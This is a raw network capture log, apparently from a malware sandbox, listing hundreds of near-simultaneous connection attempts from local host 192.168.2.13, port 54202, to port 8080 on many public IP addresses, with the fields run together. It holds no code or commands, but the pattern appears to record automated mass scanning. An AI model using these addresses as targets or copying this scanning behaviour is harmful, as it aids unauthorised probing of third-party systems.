                                              Nov 23, 2023 05:14:48.618731976 CET542028080192.168.2.1362.196.235.152
                                              Nov 23, 2023 05:14:48.618740082 CET542028080192.168.2.1395.143.48.171
                                              Nov 23, 2023 05:14:48.618740082 CET542028080192.168.2.1395.99.200.151
                                              Nov 23, 2023 05:14:48.618741035 CET542028080192.168.2.1385.207.3.65
                                              Nov 23, 2023 05:14:48.618742943 CET542028080192.168.2.1394.180.164.96
                                              Nov 23, 2023 05:14:48.618756056 CET542028080192.168.2.1394.227.178.205
                                              Nov 23, 2023 05:14:48.618758917 CET542028080192.168.2.1331.77.76.198
                                              Nov 23, 2023 05:14:48.618768930 CET542028080192.168.2.1362.166.5.60
                                              Nov 23, 2023 05:14:48.618773937 CET542028080192.168.2.1394.227.101.45
                                              Nov 23, 2023 05:14:48.618776083 CET542028080192.168.2.1362.95.139.155
                                              Nov 23, 2023 05:14:48.618776083 CET542028080192.168.2.1394.165.37.63
                                              Nov 23, 2023 05:14:48.618777990 CET542028080192.168.2.1331.42.26.112
                                              Nov 23, 2023 05:14:48.618778944 CET542028080192.168.2.1385.187.48.61
                                              Nov 23, 2023 05:14:48.618777990 CET542028080192.168.2.1394.45.164.201
                                              Nov 23, 2023 05:14:48.618778944 CET542028080192.168.2.1395.68.230.59
                                              Nov 23, 2023 05:14:48.618777990 CET542028080192.168.2.1385.77.151.226
                                              Nov 23, 2023 05:14:48.618797064 CET542028080192.168.2.1385.43.177.7
                                              Nov 23, 2023 05:14:48.618797064 CET542028080192.168.2.1362.147.159.52
                                              Nov 23, 2023 05:14:48.618798018 CET542028080192.168.2.1385.0.84.193
                                              Nov 23, 2023 05:14:48.618798018 CET542028080192.168.2.1395.19.213.65
                                              Nov 23, 2023 05:14:48.618808031 CET542028080192.168.2.1395.56.158.151
                                              Nov 23, 2023 05:14:48.618817091 CET542028080192.168.2.1331.37.58.176
                                              Nov 23, 2023 05:14:48.618817091 CET542028080192.168.2.1362.234.94.138
                                              Nov 23, 2023 05:14:48.618819952 CET542028080192.168.2.1331.179.66.138
                                              Nov 23, 2023 05:14:48.618820906 CET542028080192.168.2.1395.183.4.68
                                              Nov 23, 2023 05:14:48.618820906 CET542028080192.168.2.1331.143.27.85
                                              Nov 23, 2023 05:14:48.618820906 CET542028080192.168.2.1385.119.127.6
                                              Nov 23, 2023 05:14:48.618830919 CET542028080192.168.2.1394.74.97.33
                                              Nov 23, 2023 05:14:48.618830919 CET542028080192.168.2.1385.65.138.147
                                              Nov 23, 2023 05:14:48.618837118 CET542028080192.168.2.1331.109.254.200
                                              Nov 23, 2023 05:14:48.618837118 CET542028080192.168.2.1385.114.13.62
                                              Nov 23, 2023 05:14:48.618855000 CET542028080192.168.2.1385.222.194.126
                                              Nov 23, 2023 05:14:48.618855953 CET542028080192.168.2.1362.239.100.202
                                              Nov 23, 2023 05:14:48.618855953 CET542028080192.168.2.1385.183.68.250
                                              Nov 23, 2023 05:14:48.618866920 CET542028080192.168.2.1362.234.133.180
                                              Nov 23, 2023 05:14:48.618870020 CET542028080192.168.2.1394.86.73.13
                                              Nov 23, 2023 05:14:48.618870020 CET542028080192.168.2.1394.61.248.114
                                              Nov 23, 2023 05:14:48.618870020 CET542028080192.168.2.1362.131.175.237
                                              Nov 23, 2023 05:14:48.618871927 CET542028080192.168.2.1362.103.12.153
                                              Nov 23, 2023 05:14:48.618872881 CET542028080192.168.2.1331.21.210.123
                                              Nov 23, 2023 05:14:48.618877888 CET542028080192.168.2.1362.39.83.239
                                              Nov 23, 2023 05:14:48.618885994 CET542028080192.168.2.1395.175.161.230
                                              Nov 23, 2023 05:14:48.618896961 CET542028080192.168.2.1331.157.175.151
                                              Nov 23, 2023 05:14:48.618897915 CET542028080192.168.2.1331.134.223.44
                                              Nov 23, 2023 05:14:48.618897915 CET542028080192.168.2.1362.57.120.31
                                              Nov 23, 2023 05:14:48.618900061 CET542028080192.168.2.1331.200.8.70
                                              Nov 23, 2023 05:14:48.618910074 CET542028080192.168.2.1395.86.82.175
                                              Nov 23, 2023 05:14:48.618910074 CET542028080192.168.2.1385.95.190.238
                                              Nov 23, 2023 05:14:48.618916988 CET542028080192.168.2.1362.186.15.78
                                              Nov 23, 2023 05:14:48.618918896 CET542028080192.168.2.1394.175.252.38
                                              Nov 23, 2023 05:14:48.618927956 CET542028080192.168.2.1362.141.126.93
                                              Nov 23, 2023 05:14:48.618930101 CET542028080192.168.2.1395.133.234.236
                                              Nov 23, 2023 05:14:48.618930101 CET542028080192.168.2.1385.179.238.34
                                              Nov 23, 2023 05:14:48.618931055 CET542028080192.168.2.1394.29.179.178
                                              Nov 23, 2023 05:14:48.618946075 CET542028080192.168.2.1395.119.11.183
                                              Nov 23, 2023 05:14:48.618947983 CET542028080192.168.2.1331.156.96.166
                                              Nov 23, 2023 05:14:48.618947983 CET542028080192.168.2.1331.123.90.87
                                              Nov 23, 2023 05:14:48.618951082 CET542028080192.168.2.1394.228.108.233
                                              Nov 23, 2023 05:14:48.618968010 CET542028080192.168.2.1362.150.15.135
                                              Nov 23, 2023 05:14:48.618968964 CET542028080192.168.2.1362.223.143.76
                                              Nov 23, 2023 05:14:48.618969917 CET542028080192.168.2.1395.208.47.115
                                              Nov 23, 2023 05:14:48.618969917 CET542028080192.168.2.1394.0.30.188
                                              Nov 23, 2023 05:14:48.618969917 CET542028080192.168.2.1395.210.141.36
                                              Nov 23, 2023 05:14:48.618969917 CET542028080192.168.2.1385.176.24.216
                                              Nov 23, 2023 05:14:48.618980885 CET542028080192.168.2.1394.213.160.118
                                              Nov 23, 2023 05:14:48.618982077 CET542028080192.168.2.1331.113.227.107
                                              Nov 23, 2023 05:14:48.618983030 CET542028080192.168.2.1331.83.128.214
                                              Nov 23, 2023 05:14:48.618983984 CET542028080192.168.2.1362.198.134.53
                                              Nov 23, 2023 05:14:48.618983984 CET542028080192.168.2.1394.230.251.184
                                              Nov 23, 2023 05:14:48.618993998 CET542028080192.168.2.1394.246.36.130
                                              Nov 23, 2023 05:14:48.618994951 CET542028080192.168.2.1394.124.101.126
                                              Nov 23, 2023 05:14:48.618994951 CET542028080192.168.2.1395.204.166.7
                                              Nov 23, 2023 05:14:48.618999958 CET542028080192.168.2.1395.107.180.135
                                              Nov 23, 2023 05:14:48.619008064 CET542028080192.168.2.1394.150.151.196
                                              Nov 23, 2023 05:14:48.619009018 CET542028080192.168.2.1385.116.125.217
                                              Nov 23, 2023 05:14:48.619009018 CET542028080192.168.2.1395.184.100.41
                                              Nov 23, 2023 05:14:48.619009018 CET542028080192.168.2.1395.223.205.104
                                              Nov 23, 2023 05:14:48.619009972 CET542028080192.168.2.1385.246.185.176
                                              Nov 23, 2023 05:14:48.619024038 CET542028080192.168.2.1385.85.138.199
                                              Nov 23, 2023 05:14:48.619025946 CET542028080192.168.2.1331.54.28.30
                                              Nov 23, 2023 05:14:48.619029045 CET542028080192.168.2.1385.94.150.66
                                              Nov 23, 2023 05:14:48.619036913 CET542028080192.168.2.1395.112.240.138
                                              Nov 23, 2023 05:14:48.619049072 CET542028080192.168.2.1395.133.170.27
                                              Nov 23, 2023 05:14:48.619052887 CET542028080192.168.2.1394.36.70.227
                                              Nov 23, 2023 05:14:48.619052887 CET542028080192.168.2.1362.220.184.210
                                              Nov 23, 2023 05:14:48.619055986 CET542028080192.168.2.1394.84.71.220
                                              Nov 23, 2023 05:14:48.619056940 CET542028080192.168.2.1362.96.16.97
                                              Nov 23, 2023 05:14:48.619060040 CET542028080192.168.2.1395.161.245.166
                                              Nov 23, 2023 05:14:48.619060040 CET542028080192.168.2.1362.183.245.207
                                              Nov 23, 2023 05:14:48.619079113 CET542028080192.168.2.1385.178.34.142
                                              Nov 23, 2023 05:14:48.619079113 CET542028080192.168.2.1331.233.86.174
                                              Nov 23, 2023 05:14:48.619081020 CET542028080192.168.2.1362.77.123.160
                                              Nov 23, 2023 05:14:48.619081020 CET542028080192.168.2.1395.148.172.254
                                              Nov 23, 2023 05:14:48.619081974 CET542028080192.168.2.1395.48.246.196
                                              Nov 23, 2023 05:14:48.619080067 CET542028080192.168.2.1395.13.112.164
                                              Nov 23, 2023 05:14:48.619091988 CET542028080192.168.2.1394.146.213.220
                                              Nov 23, 2023 05:14:48.619091988 CET542028080192.168.2.1385.21.57.5
                                              Nov 23, 2023 05:14:48.619105101 CET542028080192.168.2.1385.216.4.18
                                              Nov 23, 2023 05:14:48.619110107 CET542028080192.168.2.1385.165.184.64
                                              Nov 23, 2023 05:14:48.619115114 CET542028080192.168.2.1331.164.33.71
                                              Nov 23, 2023 05:14:48.619116068 CET542028080192.168.2.1331.11.136.119
                                              Nov 23, 2023 05:14:48.619116068 CET542028080192.168.2.1362.73.71.14
                                              Nov 23, 2023 05:14:48.619119883 CET542028080192.168.2.1362.89.88.157
                                              Nov 23, 2023 05:14:48.619116068 CET542028080192.168.2.1394.18.123.14
                                              Nov 23, 2023 05:14:48.619129896 CET542028080192.168.2.1362.42.180.26
                                              Nov 23, 2023 05:14:48.619132996 CET542028080192.168.2.1395.159.65.63
                                              Nov 23, 2023 05:14:48.619132996 CET542028080192.168.2.1362.63.193.130
                                              Nov 23, 2023 05:14:48.619154930 CET542028080192.168.2.1331.28.136.252
                                              Nov 23, 2023 05:14:48.619154930 CET542028080192.168.2.1331.20.45.220
                                              Nov 23, 2023 05:14:48.619154930 CET542028080192.168.2.1395.32.242.215
                                              Nov 23, 2023 05:14:48.619154930 CET542028080192.168.2.1362.179.13.144
                                              Nov 23, 2023 05:14:48.619157076 CET542028080192.168.2.1385.202.167.249
                                              Nov 23, 2023 05:14:48.619173050 CET542028080192.168.2.1385.86.251.155
                                              Nov 23, 2023 05:14:48.619170904 CET542028080192.168.2.1394.169.231.155
                                              Nov 23, 2023 05:14:48.619170904 CET542028080192.168.2.1362.46.141.195
                                              Nov 23, 2023 05:14:48.619184017 CET542028080192.168.2.1362.80.150.76
                                              Nov 23, 2023 05:14:48.619187117 CET542028080192.168.2.1362.225.88.158
                                              Nov 23, 2023 05:14:48.619193077 CET542028080192.168.2.1395.206.132.27
                                              Nov 23, 2023 05:14:48.619193077 CET542028080192.168.2.1385.52.130.1
                                              Nov 23, 2023 05:14:48.619203091 CET542028080192.168.2.1395.65.132.80
                                              Nov 23, 2023 05:14:48.619203091 CET542028080192.168.2.1385.78.211.1
                                              Nov 23, 2023 05:14:48.619213104 CET542028080192.168.2.1331.33.26.140
                                              Nov 23, 2023 05:14:48.619215965 CET542028080192.168.2.1331.225.8.9
                                              Nov 23, 2023 05:14:48.619215965 CET542028080192.168.2.1385.220.112.85
                                              Nov 23, 2023 05:14:48.619225979 CET542028080192.168.2.1331.153.156.96
                                              Nov 23, 2023 05:14:48.619226933 CET542028080192.168.2.1394.231.49.2
                                              Nov 23, 2023 05:14:48.619226933 CET542028080192.168.2.1394.22.123.168
                                              Nov 23, 2023 05:14:48.619230986 CET542028080192.168.2.1331.31.24.195
                                              Nov 23, 2023 05:14:48.619231939 CET542028080192.168.2.1394.15.132.228
                                              Nov 23, 2023 05:14:48.619247913 CET542028080192.168.2.1385.85.159.52
                                              Nov 23, 2023 05:14:48.619247913 CET542028080192.168.2.1394.15.20.169
                                              Nov 23, 2023 05:14:48.619252920 CET542028080192.168.2.1331.50.5.120
                                              Nov 23, 2023 05:14:48.619252920 CET542028080192.168.2.1331.127.245.174
                                              Nov 23, 2023 05:14:48.619252920 CET542028080192.168.2.1395.160.165.129
                                              Nov 23, 2023 05:14:48.619252920 CET542028080192.168.2.1331.4.238.7
                                              Nov 23, 2023 05:14:48.619255066 CET542028080192.168.2.1395.24.71.132
                                              Nov 23, 2023 05:14:48.619252920 CET542028080192.168.2.1385.84.154.179
                                              Nov 23, 2023 05:14:48.619267941 CET542028080192.168.2.1385.75.159.96
                                              Nov 23, 2023 05:14:48.619270086 CET542028080192.168.2.1331.8.185.82
                                              Nov 23, 2023 05:14:48.619271994 CET542028080192.168.2.1385.176.110.159
                                              Nov 23, 2023 05:14:48.619278908 CET542028080192.168.2.1394.58.20.161
                                              Nov 23, 2023 05:14:48.619281054 CET542028080192.168.2.1394.103.111.229
                                              Nov 23, 2023 05:14:48.619290113 CET542028080192.168.2.1395.94.174.38
                                              Nov 23, 2023 05:14:48.619293928 CET542028080192.168.2.1394.4.139.160
                                              Nov 23, 2023 05:14:48.619293928 CET542028080192.168.2.1395.15.217.13
                                              Nov 23, 2023 05:14:48.619309902 CET542028080192.168.2.1362.245.138.247
                                              Nov 23, 2023 05:14:48.619311094 CET542028080192.168.2.1385.216.5.122
                                              Nov 23, 2023 05:14:48.619311094 CET542028080192.168.2.1362.97.253.74
                                              Nov 23, 2023 05:14:48.619314909 CET542028080192.168.2.1394.105.246.190
                                              Nov 23, 2023 05:14:48.619316101 CET542028080192.168.2.1395.203.3.58
                                              Nov 23, 2023 05:14:48.619316101 CET542028080192.168.2.1394.25.167.22
                                              Nov 23, 2023 05:14:48.619322062 CET542028080192.168.2.1331.2.139.158
                                              Nov 23, 2023 05:14:48.619322062 CET542028080192.168.2.1394.248.182.3
                                              Nov 23, 2023 05:14:48.619323015 CET542028080192.168.2.1331.159.173.211
                                              Nov 23, 2023 05:14:48.619337082 CET542028080192.168.2.1385.46.148.194
                                              Nov 23, 2023 05:14:48.619340897 CET542028080192.168.2.1395.59.221.127
                                              Nov 23, 2023 05:14:48.619342089 CET542028080192.168.2.1394.163.129.141
                                              Nov 23, 2023 05:14:48.619350910 CET542028080192.168.2.1331.219.190.244
                                              Nov 23, 2023 05:14:48.619350910 CET542028080192.168.2.1362.189.214.252
                                              Nov 23, 2023 05:14:48.619350910 CET542028080192.168.2.1362.51.180.208
                                              Nov 23, 2023 05:14:48.619354010 CET542028080192.168.2.1331.174.51.233
                                              Nov 23, 2023 05:14:48.619369030 CET542028080192.168.2.1331.68.89.65
                                              Nov 23, 2023 05:14:48.619369030 CET542028080192.168.2.1394.180.166.161
                                              Nov 23, 2023 05:14:48.619371891 CET542028080192.168.2.1395.79.116.195
                                              Nov 23, 2023 05:14:48.619371891 CET542028080192.168.2.1395.210.144.1
                                              Nov 23, 2023 05:14:48.619388103 CET542028080192.168.2.1394.148.201.21
                                              Nov 23, 2023 05:14:48.619390965 CET542028080192.168.2.1331.192.5.18
                                              Nov 23, 2023 05:14:48.619390965 CET542028080192.168.2.1395.108.127.128
                                              Nov 23, 2023 05:14:48.619390965 CET542028080192.168.2.1394.178.222.26
                                              Nov 23, 2023 05:14:48.619398117 CET542028080192.168.2.1385.103.1.17
                                              Nov 23, 2023 05:14:48.619398117 CET542028080192.168.2.1395.208.165.32
                                              Nov 23, 2023 05:14:48.619398117 CET542028080192.168.2.1362.7.102.86
                                              Nov 23, 2023 05:14:48.619414091 CET542028080192.168.2.1394.2.214.223
                                              Nov 23, 2023 05:14:48.619415998 CET542028080192.168.2.1395.124.11.23
                                              Nov 23, 2023 05:14:48.619420052 CET542028080192.168.2.1331.175.80.198
                                              Nov 23, 2023 05:14:48.619426966 CET542028080192.168.2.1331.156.27.212
                                              Nov 23, 2023 05:14:48.619429111 CET542028080192.168.2.1395.221.79.160
                                              Nov 23, 2023 05:14:48.619431973 CET542028080192.168.2.1362.102.74.153
                                              Nov 23, 2023 05:14:48.619436979 CET542028080192.168.2.1331.106.99.126
                                              Nov 23, 2023 05:14:48.619457960 CET542028080192.168.2.1394.133.25.135
                                              Nov 23, 2023 05:14:48.619457960 CET542028080192.168.2.1395.211.233.157
                                              Nov 23, 2023 05:14:48.619457960 CET542028080192.168.2.1395.241.128.40
                                              Nov 23, 2023 05:14:48.619457960 CET542028080192.168.2.1395.106.220.46
                                              Nov 23, 2023 05:14:48.619462967 CET542028080192.168.2.1394.158.228.52
                                              Nov 23, 2023 05:14:48.619468927 CET542028080192.168.2.1394.116.187.246
                                              Nov 23, 2023 05:14:48.619481087 CET542028080192.168.2.1395.83.120.237
                                              Nov 23, 2023 05:14:48.619482994 CET542028080192.168.2.1331.70.88.47
                                              Nov 23, 2023 05:14:48.619482994 CET542028080192.168.2.1395.190.43.199
                                              Nov 23, 2023 05:14:48.619483948 CET542028080192.168.2.1362.144.130.167
                                              Nov 23, 2023 05:14:48.619483948 CET542028080192.168.2.1395.82.183.233
                                              Nov 23, 2023 05:14:48.619483948 CET542028080192.168.2.1362.57.169.97
                                              Nov 23, 2023 05:14:48.619489908 CET542028080192.168.2.1385.125.50.100
                                              Nov 23, 2023 05:14:48.619492054 CET542028080192.168.2.1395.118.176.97
                                              Nov 23, 2023 05:14:48.619503975 CET542028080192.168.2.1331.161.182.217
                                              Nov 23, 2023 05:14:48.619508028 CET542028080192.168.2.1395.57.10.124
                                              Nov 23, 2023 05:14:48.619508982 CET542028080192.168.2.1385.224.201.190
                                              Nov 23, 2023 05:14:48.619513988 CET542028080192.168.2.1395.174.229.11
                                              Nov 23, 2023 05:14:48.619519949 CET542028080192.168.2.1362.114.124.246
                                              Nov 23, 2023 05:14:48.619525909 CET542028080192.168.2.1385.115.159.198
                                              Nov 23, 2023 05:14:48.619529009 CET542028080192.168.2.1331.57.65.236
                                              Nov 23, 2023 05:14:48.619529009 CET542028080192.168.2.1395.109.158.85
                                              Nov 23, 2023 05:14:48.619544983 CET542028080192.168.2.1385.43.130.177
                                              Nov 23, 2023 05:14:48.619544983 CET542028080192.168.2.1331.71.58.148
                                              Nov 23, 2023 05:14:48.619545937 CET542028080192.168.2.1394.40.1.76
                                              Nov 23, 2023 05:14:48.619549036 CET542028080192.168.2.1362.133.130.119
                                              Nov 23, 2023 05:14:48.619568110 CET542028080192.168.2.1385.33.124.16
                                              Nov 23, 2023 05:14:48.619570971 CET542028080192.168.2.1385.231.190.127
                                              Nov 23, 2023 05:14:48.619571924 CET542028080192.168.2.1331.70.131.112
                                              Nov 23, 2023 05:14:48.619571924 CET542028080192.168.2.1394.52.156.18
                                              Nov 23, 2023 05:14:48.619577885 CET542028080192.168.2.1331.187.210.164
                                              Nov 23, 2023 05:14:48.619591951 CET542028080192.168.2.1385.224.65.66
                                              Nov 23, 2023 05:14:48.619595051 CET542028080192.168.2.1362.58.143.226
                                              Nov 23, 2023 05:14:48.619599104 CET542028080192.168.2.1362.43.207.162
                                              Nov 23, 2023 05:14:48.619599104 CET542028080192.168.2.1385.230.54.34
                                              Nov 23, 2023 05:14:48.619599104 CET542028080192.168.2.1331.253.44.115
                                              Nov 23, 2023 05:14:48.619599104 CET542028080192.168.2.1395.39.59.94
                                              Nov 23, 2023 05:14:48.619601011 CET542028080192.168.2.1362.80.70.193
                                              Nov 23, 2023 05:14:48.619601965 CET542028080192.168.2.1362.184.214.236
                                              Nov 23, 2023 05:14:48.619607925 CET542028080192.168.2.1395.73.90.235
                                              Nov 23, 2023 05:14:48.619623899 CET542028080192.168.2.1395.61.209.189
                                              Nov 23, 2023 05:14:48.619626999 CET542028080192.168.2.1395.113.250.194
                                              Nov 23, 2023 05:14:48.619626999 CET542028080192.168.2.1385.13.85.186
                                              Nov 23, 2023 05:14:48.619626999 CET542028080192.168.2.1385.114.1.239
                                              Nov 23, 2023 05:14:48.619646072 CET542028080192.168.2.1394.209.160.197
                                              Nov 23, 2023 05:14:48.619646072 CET542028080192.168.2.1362.203.217.152
                                              Nov 23, 2023 05:14:48.619646072 CET542028080192.168.2.1394.1.156.29
                                              Nov 23, 2023 05:14:48.619653940 CET542028080192.168.2.1331.120.144.129
                                              Nov 23, 2023 05:14:48.619663954 CET542028080192.168.2.1362.142.59.115
                                              Nov 23, 2023 05:14:48.619663954 CET542028080192.168.2.1395.165.173.127
                                              Nov 23, 2023 05:14:48.619666100 CET542028080192.168.2.1394.51.137.25
                                              Nov 23, 2023 05:14:48.619666100 CET542028080192.168.2.1395.1.101.36
                                              Nov 23, 2023 05:14:48.619676113 CET542028080192.168.2.1394.52.191.217
                                              Nov 23, 2023 05:14:48.619685888 CET542028080192.168.2.1394.81.79.12
                                              Nov 23, 2023 05:14:48.619688034 CET542028080192.168.2.1394.115.137.208
                                              Nov 23, 2023 05:14:48.619688034 CET542028080192.168.2.1331.88.7.210
                                              Nov 23, 2023 05:14:48.619699001 CET542028080192.168.2.1331.59.152.60
                                              Nov 23, 2023 05:14:48.619703054 CET542028080192.168.2.1331.107.59.104
                                              Nov 23, 2023 05:14:48.619703054 CET542028080192.168.2.1395.28.210.131
                                              Nov 23, 2023 05:14:48.619704008 CET542028080192.168.2.1385.141.175.194
                                              Nov 23, 2023 05:14:48.619704008 CET542028080192.168.2.1331.253.74.188
                                              Nov 23, 2023 05:14:48.619703054 CET542028080192.168.2.1331.45.28.137
                                              Nov 23, 2023 05:14:48.619704008 CET542028080192.168.2.1394.32.216.110
                                              Nov 23, 2023 05:14:48.619704008 CET542028080192.168.2.1385.84.189.182
                                              Nov 23, 2023 05:14:48.619704008 CET542028080192.168.2.1385.57.177.235
                                              Nov 23, 2023 05:14:48.619714022 CET542028080192.168.2.1395.246.148.118
                                              Nov 23, 2023 05:14:48.619714022 CET542028080192.168.2.1394.247.98.213
                                              Nov 23, 2023 05:14:48.619729996 CET542028080192.168.2.1385.183.56.84
                                              Nov 23, 2023 05:14:48.619729996 CET542028080192.168.2.1362.220.84.71
                                              Nov 23, 2023 05:14:48.619730949 CET542028080192.168.2.1394.104.18.75
                                              Nov 23, 2023 05:14:48.619730949 CET542028080192.168.2.1362.232.139.55
                                              Nov 23, 2023 05:14:48.619730949 CET542028080192.168.2.1395.13.101.253
                                              Nov 23, 2023 05:14:48.619736910 CET542028080192.168.2.1331.214.19.120
                                              Nov 23, 2023 05:14:48.619752884 CET542028080192.168.2.1362.130.69.29
                                              Nov 23, 2023 05:14:48.619755030 CET542028080192.168.2.1385.61.23.172
                                              Nov 23, 2023 05:14:48.619761944 CET542028080192.168.2.1395.250.78.129
                                              Nov 23, 2023 05:14:48.619761944 CET542028080192.168.2.1394.159.32.75
                                              Nov 23, 2023 05:14:48.619761944 CET542028080192.168.2.1394.154.176.29
                                              Nov 23, 2023 05:14:48.619761944 CET542028080192.168.2.1395.141.232.130
                                              Nov 23, 2023 05:14:48.619761944 CET542028080192.168.2.1394.186.235.52
                                              Nov 23, 2023 05:14:48.619777918 CET542028080192.168.2.1331.171.75.110
                                              Nov 23, 2023 05:14:48.619784117 CET542028080192.168.2.1385.148.38.247
                                              Nov 23, 2023 05:14:48.619784117 CET542028080192.168.2.1395.107.73.242
                                              Nov 23, 2023 05:14:48.619784117 CET542028080192.168.2.1331.169.220.89
                                              Nov 23, 2023 05:14:48.619790077 CET542028080192.168.2.1362.172.52.46
                                              Nov 23, 2023 05:14:48.619793892 CET542028080192.168.2.1395.55.78.77
                                              Nov 23, 2023 05:14:48.619796991 CET542028080192.168.2.1362.66.18.53
                                              Nov 23, 2023 05:14:48.619802952 CET542028080192.168.2.1362.28.4.111
                                              Nov 23, 2023 05:14:48.619803905 CET542028080192.168.2.1395.230.198.136
                                              Nov 23, 2023 05:14:48.619812012 CET542028080192.168.2.1385.37.176.213
                                              Nov 23, 2023 05:14:48.619833946 CET542028080192.168.2.1395.7.236.102
                                              Nov 23, 2023 05:14:48.619833946 CET542028080192.168.2.1362.137.40.74
                                              Nov 23, 2023 05:14:48.619834900 CET542028080192.168.2.1362.152.58.86
                                              Nov 23, 2023 05:14:48.619834900 CET542028080192.168.2.1394.149.107.102
                                              Nov 23, 2023 05:14:48.619836092 CET542028080192.168.2.1385.214.71.85
                                              Nov 23, 2023 05:14:48.619834900 CET542028080192.168.2.1395.157.39.123
                                              Nov 23, 2023 05:14:48.619848013 CET542028080192.168.2.1394.17.148.154
                                              Nov 23, 2023 05:14:48.619853973 CET542028080192.168.2.1394.207.59.221
                                              Nov 23, 2023 05:14:48.619853973 CET542028080192.168.2.1362.19.58.0
                                              Nov 23, 2023 05:14:48.619854927 CET542028080192.168.2.1394.102.126.15
                                              Nov 23, 2023 05:14:48.619862080 CET542028080192.168.2.1385.225.92.60
                                              Nov 23, 2023 05:14:48.619878054 CET542028080192.168.2.1362.70.108.61
                                              Nov 23, 2023 05:14:48.619879007 CET542028080192.168.2.1394.223.54.118
                                              Nov 23, 2023 05:14:48.619879007 CET542028080192.168.2.1331.124.119.190
                                              Nov 23, 2023 05:14:48.619882107 CET542028080192.168.2.1331.126.142.106
                                              Nov 23, 2023 05:14:48.619887114 CET542028080192.168.2.1395.71.45.221
                                              Nov 23, 2023 05:14:48.619894028 CET542028080192.168.2.1385.20.119.125
                                              Nov 23, 2023 05:14:48.619900942 CET542028080192.168.2.1394.80.35.33
                                              Nov 23, 2023 05:14:48.619905949 CET542028080192.168.2.1331.99.149.241
                                              Nov 23, 2023 05:14:48.619916916 CET542028080192.168.2.1395.180.175.132
                                              Nov 23, 2023 05:14:48.619916916 CET542028080192.168.2.1362.88.244.69
                                              Nov 23, 2023 05:14:48.619918108 CET542028080192.168.2.1394.139.66.43
                                              Nov 23, 2023 05:14:48.619918108 CET542028080192.168.2.1331.95.88.185
                                              Nov 23, 2023 05:14:48.619937897 CET542028080192.168.2.1331.57.176.237
                                              Nov 23, 2023 05:14:48.619937897 CET542028080192.168.2.1385.237.151.163
                                              Nov 23, 2023 05:14:48.619940042 CET542028080192.168.2.1331.137.144.207
                                              Nov 23, 2023 05:14:48.619944096 CET542028080192.168.2.1331.18.130.170
                                              Nov 23, 2023 05:14:48.619944096 CET542028080192.168.2.1331.39.95.64
                                              Nov 23, 2023 05:14:48.619952917 CET542028080192.168.2.1395.122.205.40
                                              Nov 23, 2023 05:14:48.619971991 CET542028080192.168.2.1385.24.77.64
                                              Nov 23, 2023 05:14:48.619975090 CET542028080192.168.2.1395.39.241.153
                                              Nov 23, 2023 05:14:48.619975090 CET542028080192.168.2.1385.40.13.81
                                              Nov 23, 2023 05:14:48.619986057 CET542028080192.168.2.1395.230.94.234
                                              Nov 23, 2023 05:14:48.619997025 CET542028080192.168.2.1394.84.177.59
                                              Nov 23, 2023 05:14:48.620001078 CET542028080192.168.2.1394.193.33.122
                                              Nov 23, 2023 05:14:48.620001078 CET542028080192.168.2.1331.219.227.156
                                              Nov 23, 2023 05:14:48.620012045 CET542028080192.168.2.1395.34.41.11
                                              Nov 23, 2023 05:14:48.620012999 CET542028080192.168.2.1394.23.80.105
                                              Nov 23, 2023 05:14:48.620014906 CET542028080192.168.2.1385.198.102.4
                                              Nov 23, 2023 05:14:48.620014906 CET542028080192.168.2.1331.109.253.76
                                              Nov 23, 2023 05:14:48.620028019 CET542028080192.168.2.1331.116.44.77
                                              Nov 23, 2023 05:14:48.620048046 CET542028080192.168.2.1362.210.30.7
                                              Nov 23, 2023 05:14:48.620058060 CET542028080192.168.2.1395.91.23.96
                                              Nov 23, 2023 05:14:48.620060921 CET542028080192.168.2.1394.185.251.239
                                              Nov 23, 2023 05:14:48.620060921 CET542028080192.168.2.1394.14.88.161
                                              Nov 23, 2023 05:14:48.620073080 CET542028080192.168.2.1394.199.202.107
                                              Nov 23, 2023 05:14:48.620073080 CET542028080192.168.2.1394.97.104.104
                                              Nov 23, 2023 05:14:48.620074034 CET542028080192.168.2.1394.49.25.91
                                              Nov 23, 2023 05:14:48.620074034 CET542028080192.168.2.1395.152.129.95
                                              Nov 23, 2023 05:14:48.620078087 CET542028080192.168.2.1394.30.110.33
                                              Nov 23, 2023 05:14:48.620089054 CET542028080192.168.2.1394.246.238.41
                                              Nov 23, 2023 05:14:48.620091915 CET542028080192.168.2.1331.44.116.135
                                              Nov 23, 2023 05:14:48.620095015 CET542028080192.168.2.1385.123.141.197
                                              Nov 23, 2023 05:14:48.620100021 CET542028080192.168.2.1395.19.154.43
                                              Nov 23, 2023 05:14:48.620115042 CET542028080192.168.2.1331.41.134.183
                                              Nov 23, 2023 05:14:48.620115995 CET542028080192.168.2.1362.218.162.105
                                              Nov 23, 2023 05:14:48.620120049 CET542028080192.168.2.1394.208.6.179
                                              Nov 23, 2023 05:14:48.620131969 CET542028080192.168.2.1395.122.244.198
                                              Nov 23, 2023 05:14:48.620136976 CET542028080192.168.2.1394.187.144.237
                                              Nov 23, 2023 05:14:48.620145082 CET542028080192.168.2.1394.196.149.104
                                              Nov 23, 2023 05:14:48.620157003 CET542028080192.168.2.1385.68.190.226
                                              Nov 23, 2023 05:14:48.620158911 CET542028080192.168.2.1362.89.124.51
                                              Nov 23, 2023 05:14:48.620158911 CET542028080192.168.2.1385.68.15.217
                                              Nov 23, 2023 05:14:48.620158911 CET542028080192.168.2.1331.250.111.244
                                              Nov 23, 2023 05:14:48.620174885 CET542028080192.168.2.1394.53.177.74
                                              Nov 23, 2023 05:14:48.620176077 CET542028080192.168.2.1331.236.117.192
                                              Nov 23, 2023 05:14:48.620177984 CET542028080192.168.2.1395.133.150.185
                                              Nov 23, 2023 05:14:48.620177984 CET542028080192.168.2.1331.136.47.50
                                              Nov 23, 2023 05:14:48.620182991 CET542028080192.168.2.1394.77.20.179
                                              Nov 23, 2023 05:14:48.620188951 CET542028080192.168.2.1385.56.198.247
                                              Nov 23, 2023 05:14:48.620193005 CET542028080192.168.2.1395.191.119.63
                                              Nov 23, 2023 05:14:48.620198011 CET542028080192.168.2.1385.111.36.27
                                              Nov 23, 2023 05:14:48.620213032 CET542028080192.168.2.1385.23.181.126
                                              Nov 23, 2023 05:14:48.620222092 CET542028080192.168.2.1385.156.89.95
                                              Nov 23, 2023 05:14:48.620229959 CET542028080192.168.2.1394.37.149.97
                                              Nov 23, 2023 05:14:48.620229959 CET542028080192.168.2.1331.64.175.214
                                              Nov 23, 2023 05:14:48.620239973 CET542028080192.168.2.1395.98.91.73
                                              Nov 23, 2023 05:14:48.620239973 CET542028080192.168.2.1331.147.164.61
                                              Nov 23, 2023 05:14:48.620240927 CET542028080192.168.2.1394.217.97.153
